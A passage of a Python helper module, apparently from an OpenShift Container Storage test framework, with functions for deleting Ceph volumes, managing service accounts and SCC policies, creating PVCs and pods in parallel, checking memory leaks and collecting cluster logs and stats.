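#         pool_name=constants.DEFAULT_BLOCKPOOL,
#     )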
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
        interface (str): The interface backing the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout,
2,
is_volume_present_in_backend,
interface=interface,
image_uuid=image_uuid,
pool_name=pool_name,
):
if not ret:
break
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted " f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd("ceph progress json", format=None)
ct_pod.exec_ceph_cmd("ceph rbd task list")
return False
def delete_volume_in_backend(img_uuid, pool_name=None):
"""
Delete an Image/Subvolume in the backend
Args:
img_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
        pool_name (str): The name of the pool
Returns:
bool: True if image deleted successfully
False if:
Pool not found
image not found
image not deleted
"""
cmd = ""
valid_error = []
pool_cr = get_pool_cr(pool_name)
if pool_cr is not None:
if pool_cr["kind"] == "CephFilesystem":
interface = "CephFileSystem"
else:
interface = pool_cr["kind"]
logger.info(f"pool {pool_cr} kind is {interface}")
else:
logger.info(
f"Pool {pool_name} has no kind of "
f"{constants.CEPHBLOCKPOOL} "
f"or {constants.CEPHFILESYSTEM}"
)
return False
# Checking if image is present before trying to delete
image_present_results = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
    # In case the image is present, delete it
if image_present_results:
if interface == constants.CEPHBLOCKPOOL:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = ["No such file or directory"]
cmd = f"rbd rm -p {pool_name} csi-vol-{img_uuid}"
if interface == constants.CEPHFILESYSTEM:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = [
f"Subvolume 'csi-vol-{img_uuid}' not found",
f"subvolume 'csi-vol-{img_uuid}' does not exist",
]
cmd = f"ceph fs subvolume rm {get_cephfs_name()} csi-vol-{img_uuid} csi"
ct_pod = pod.get_ceph_tools_pod()
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format=None)
except CommandFailed as ecf:
if any([error in str(ecf) for error in valid_error]):
logger.info(
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {img_uuid}. Interface type: {interface}"
)
return False
verify_img_delete_result = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
if not verify_img_delete_result:
logger.info(f"Image csi-vol-{img_uuid} deleted successfully")
return True
else:
logger.info(f"Image csi-vol-{img_uuid} not deleted successfully")
return False
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
service_account_data["metadata"]["name"] = create_unique_resource_name(
"sa", "serviceaccount"
)
service_account_data["metadata"]["namespace"] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace, scc_name=constants.PRIVILEGED):
"""
    Validate that the serviceaccount is added to the given SCC
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
scc_name (str): SCC name
Returns:
        bool: True if sa_name is present in the given SCC, else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=scc_name)
scc_users_list = scc_dict.get("users")
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc anyuid and privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
scc_list = [constants.ANYUID, constants.PRIVILEGED]
for scc in scc_list:
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user {scc} system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc anyuid and privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
scc_list = [constants.ANYUID, constants.PRIVILEGED]
for scc in scc_list:
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user {scc} system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
    login credentials and the command to be run
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
        api: True if the call is for s3api, False if s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = "api" if api else ""
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3{api} "
f"--endpoint={mcg_obj.s3_internal_endpoint} "
)
string_wrapper = '"'
else:
base_command = f"aws s3{api} --no-sign-request "
string_wrapper = ""
return f"{base_command}{cmd}{string_wrapper}"
def get_current_test_name():
"""
A function to return the current test name in a parsed manner
Returns:
str: The test name.
"""
return os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0]
def setup_pod_directories(pod_obj, dir_names):
"""
Creates directories on the specified pod.
Directories created under the respective test name directory.
Args:
pod_obj: A pod object on which to create directories
dir_names: A list of directories names to create.
Returns:
list: A list of all the full paths of the created directories
"""
full_dirs_path = []
test_name = get_current_test_name()
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {test_name}")
for cur_dir in dir_names:
current = f"{test_name}/{cur_dir}"
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {current}")
full_dirs_path.append(current)
return full_dirs_path
def wait_for_resource_count_change(
func_to_use,
previous_num,
namespace,
change_type="increase",
min_difference=1,
timeout=20,
interval=2,
**func_kwargs,
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
        bool: True if difference in count is greater than or equal to
            'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample["items"])
if change_type == "increase":
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
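# Illustrative usage sketch: wait until at least 3 new pods appear in a namespace
# (the namespace and counts below are only examples):
#
#     increased = wait_for_resource_count_change(
#         func_to_use=pod.get_all_pods,
#         previous_num=5,
#         namespace="openshift-storage",
#         change_type="increase",
#         min_difference=3,
#         timeout=120,
#     )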
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f"oc debug nodes/{node_name} -- df"
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(sc_obj, namespace, number_of_pvc, size, access_modes):
"""
    Function to create multiple PVCs in parallel using threads
Function will create PVCs based on the available access modes
Args:
        sc_obj (obj): Storage Class object
        namespace (str): The namespace for creating pvc
        number_of_pvc (int): Number of PVCs to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs,
sc_name=sc_obj.name,
namespace=namespace,
number_of_pvc=number_of_pvc,
access_mode=mode,
size=size,
)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, "Bound", 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list,
namespace,
interface,
pod_dict_path=None,
sa_name=None,
raw_block_pv=False,
dc_deployment=False,
node_selector=None,
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
        interface (str): The interface backing the PVC
        pod_dict_path (str): pod_dict_path for yaml
        sa_name (str): sa_name for providing permission
        raw_block_pv (bool): Whether to use a raw block PV
        dc_deployment (bool): Whether to use a DeploymentConfig deployment
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
    # Use a 300 sec wait time since, in scale tests, once the setup has more
    # pods, the time taken for a pod to come up depends on the resources available
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(
executor.submit(
create_pod,
interface_type=interface,
pvc_name=pvc_obj.name,
do_reload=False,
namespace=namespace,
raw_block_pv=raw_block_pv,
pod_dict_path=pod_dict_path,
sa_name=sa_name,
dc_deployment=dc_deployment,
node_selector=node_selector,
)
)
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check for all the pods are in Running state
    # The pod creation above does not wait for the pods to be created because threads are used
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(
wait_for_resource_state, obj, "Running", timeout=wait_time
)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
    Function to analyse memory leak after execution of a test case. Memory leak is
    analyzed based on the top output "RES" value of the ceph-osd daemon, i.e.
    ``list[7]`` in the code.
    More detail on the median value: calculating memory leak requires a constant
    reference value, which should not be the start or end of the test, so it is
    calculated by collecting memory usage for 180 sec before TC execution and taking
    the median of it. The memory value can differ between nodes, so a constant value
    is identified for each node and stored in median_dict.
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
Usage::
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logger.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
        # Get the start value from the median_dict arg for the respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logger.info(f"Median value {start_value}")
logger.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__("g"):
start_value = float(1024**2 * float(start_value[:-1]))
elif start_value.__contains__("m"):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__("g"):
end_value = float(1024**2 * float(end_value[:-1]))
elif end_value.__contains__("m"):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logger.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logger.info(f"No memory leak in worker {worker} passing the test")
else:
logger.info(f"There is a memory leak in worker {worker}")
logger.info(f"Memory median value start of the test {start_value}")
logger.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
    Function to calculate the memory leak median value by collecting the data for 180 sec
    and finding the median value, which will be considered as the starting point
    to evaluate memory leak using the "RES" value of the ceph-osd daemon, i.e. ``list[7]`` in the code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logger.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN["username"]
if not password:
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["password_location"]
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["kubeconfig_location"]
)
file_path = os.path.dirname(filename)
master_list = node.get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = "auth"
check_conf = "kubeconfig"
node_path = "/home/core/"
if check_auth not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}auth"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
def get_failure_domin():
"""
    Function is used to get the failure domain of the pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format="json")
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
    In case of node failure scenarios in which the selected node is
running the ceph tools pod, we'll want to wait for the pod recovery
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods,
previous_num=1,
namespace=config.ENV_DATA["cluster_namespace"],
timeout=120,
selector=constants.TOOL_APP_LABEL,
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node name
label_key (str): Label_key to be added in worker
label_value (str): Label_value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}",
out_yaml_format=False,
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node name
label_key (str): Label_key to be remove from worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, "w") as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
        resource_name (str): Name of osd, e.g. 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = "-".join(resource_name.split("-")[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
def modify_deployment_replica_count(deployment_name, replica_count):
"""
Function to modify deployment replica count,
i.e to scale up or down deployment
Args:
deployment_name (str): Name of deployment
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=deployment_name, params=params)
def collect_performance_stats(dir_name):
"""
Collect performance stats and saves them in file in json format.
    Args:
        dir_name (str): directory name to store stats.
    Performance stats include:
        IOPS and throughput percentage of the cluster
        CPU and memory consumption of each node
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN["log_dir"]),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats",
)
if not os.path.exists(log_dir_path):
logger.info(f"Creating directory {log_dir_path}")
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT["external_mode"]
if external:
# Skip collecting performance_stats for external mode RHCS cluster
logger.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats["iops_percentage"] = iops_percentage
performance_stats["throughput_percentage"] = throughput_percentage
# ToDo: Get iops and throughput percentage of each nodes
# Get the cpu and memory of each nodes from adm top
master_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="master")
)
worker_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="worker")
)
# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="master")
)
worker_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="worker")
)
performance_stats["master_node_utilization"] = master_node_utilization_from_adm_top
performance_stats["worker_node_utilization"] = worker_node_utilization_from_adm_top
performance_stats[
"master_node_utilization_from_oc_describe"
] = master_node_utilization_from_oc_describe
performance_stats[
"worker_node_utilization_from_oc_describe"
] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, "performance")
with open(file_name, "w") as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
    Validate whether an oomkill message is found in the pod log
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
        bool : True if oomkill messages are not found in the log.
            False otherwise.
    Raises:
        AssertionError: If it fails to fetch logs
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace, container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert (
f'previous terminated container "{container}" in pod "{pod_name}" not found'
in str(ecf)
), "Failed to fetch logs"
return rc
def validate_pods_are_running_and_not_restarted(pod_name, pod_restart_count, namespace):
"""
    Validate given pod is in running state and not restarted or re-spun
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = (
pod_obj.get("status").get("containerStatuses")[0].get("restartCount")
)
pod_state = pod_obj.get("status").get("phase")
if pod_state == "Running" and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(
f"Pod is in {pod_state} state and restart count of pod {restart_count}"
)
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
    Args:
path(str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, "rb") as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
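# Illustrative usage sketch: compare checksums of a local file before and after a copy
# (the paths below are hypothetical):
#
#     original_md5 = calc_local_file_md5_sum("/tmp/original.bin")
#     copied_md5 = calc_local_file_md5_sum("/tmp/copied.bin")
#     assert original_md5 == copied_md5, "File was corrupted during copy"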
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = (
OCP(
kind="secret",
namespace="openshift-ingress-operator",
resource_name="router-ca",
)
.get()
.get("data")
.get("tls.crt")
)
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode("utf-8")
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, "w") as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
bool: True if storagecluster is running on external mode False otherwise
"""
storage_cluster = (
OCP(kind="StorageCluster", namespace=config.ENV_DATA["cluster_namespace"])
.get()
.get("items")[0]
)
return bool(
storage_cluster.get("spec", {}).get("externalStorage", {}).get("enable", False)
)
def get_pv_size(storageclass=None):
"""
Get Pv size from requested storageclass
Args:
storageclass (str): Name of storageclass
Returns:
list: list of pv's size
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
for pv_obj in pv_objs:
if pv_obj["spec"]["storageClassName"] == storageclass:
return_list.append(pv_obj["spec"]["capacity"]["storage"])
return return_list
def get_pv_names():
"""
Get Pv names
Returns:
list: list of pv names
"""
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
return [pv_obj["metadata"]["name"] for pv_obj in pv_objs]
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_RBD
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_CEPHFS
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
)
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS, resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
def get_snapshot_content_obj(snap_obj):
"""
Get volume snapshot content of a volume snapshot
Args:
snap_obj (OCS): OCS instance of kind VolumeSnapshot
Returns:
OCS: OCS instance of kind VolumeSnapshotContent
"""
data = dict()
data["api_version"] = snap_obj.api_version
data["kind"] = constants.VOLUMESNAPSHOTCONTENT
snapcontent = snap_obj.ocp.get(resource_name=snap_obj.name, out_yaml_format=True)[
"status"
]["boundVolumeSnapshotContentName"]
data["metadata"] = {"name": snapcontent, "namespace": snap_obj.namespace}
snapcontent_obj = OCS(**data)
snapcontent_obj.reload()
return snapcontent_obj
def wait_for_pv_delete(pv_objs):
"""
Wait for PVs to delete. Delete PVs having ReclaimPolicy 'Retain'
Args:
pv_objs (list): OCS instances of kind PersistentVolume
"""
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
@retry(UnexpectedBehaviour, tries=40, delay=10, backoff=1)
def fetch_used_size(cbp_name, exp_val=None):
"""
Fetch used size in the pool
    Args:
        cbp_name (str): Name of the Ceph block pool
        exp_val (float): Expected size in GB
Returns:
float: Used size in GB
"""
ct_pod = pod.get_ceph_tools_pod()
rados_status = ct_pod.exec_ceph_cmd(ceph_cmd=f"rados df -p {cbp_name}")
size_bytes = rados_status["pools"][0]["size_bytes"]
# Convert size to GB
used_in_gb = float(format(size_bytes / constants.GB, ".4f"))
if exp_val and abs(exp_val - used_in_gb) > 1.5:
raise UnexpectedBehaviour(
f"Actual {used_in_gb} and expected size {exp_val} not "
f"matching. Retrying"
)
return used_in_gb
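# Illustrative usage sketch: the retry decorator above keeps re-sampling the pool usage
# until it is within 1.5 GB of the expected value, so a mismatch only raises after all
# retries are exhausted (the pool name and expected size below are examples):
#
#     used_gb = fetch_used_size(constants.DEFAULT_BLOCKPOOL, exp_val=10.0)
#     logger.info(f"Pool used capacity: {used_gb} GB")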
def get_full_test_logs_path(cname, fname=None):
"""
Getting the full path of the logs file for particular test
    this function uses the inspect module to find the name of the caller function, so it needs
    to be called once from the main test function.
the output is in the form of
ocsci_log_path/<full test file path>/<test filename>/<test class name>/<test function name>
Args:
cname (obj): the Class object which was run and called this function
fname (str): the function name for different tests log path
Return:
str : full path of the test logs relative to the ocs-ci base logs path
"""
# the module path relative to ocs-ci base path
log_file_name = (inspect.stack()[1][1]).replace(f"{os.getcwd()}/", "")
# The name of the class
mname = type(cname).__name__
if fname is None:
fname = inspect.stack()[1][3]
# the full log path (relative to ocs-ci base path)
full_log_path = f"{ocsci_log_path()}/{log_file_name}/{mname}/{fname}"
return full_log_path
def get_mon_pdb():
"""
Check for Mon PDB
Returns:
disruptions_allowed (int): Count of mon allowed disruption
min_available_mon (int): Count of minimum mon available
        max_unavailable_mon (int): Count of maximum mon unavailable
"""
pdb_obj = OCP(
kind=constants.POD_DISRUPTION_BUDGET,
resource_name=constants.MON_PDB,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
)
disruptions_allowed = pdb_obj.get().get("status").get("disruptionsAllowed")
min_available_mon = pdb_obj.get().get("spec").get("minAvailable")
max_unavailable_mon = pdb_obj.get().get("spec").get("maxUnavailable")
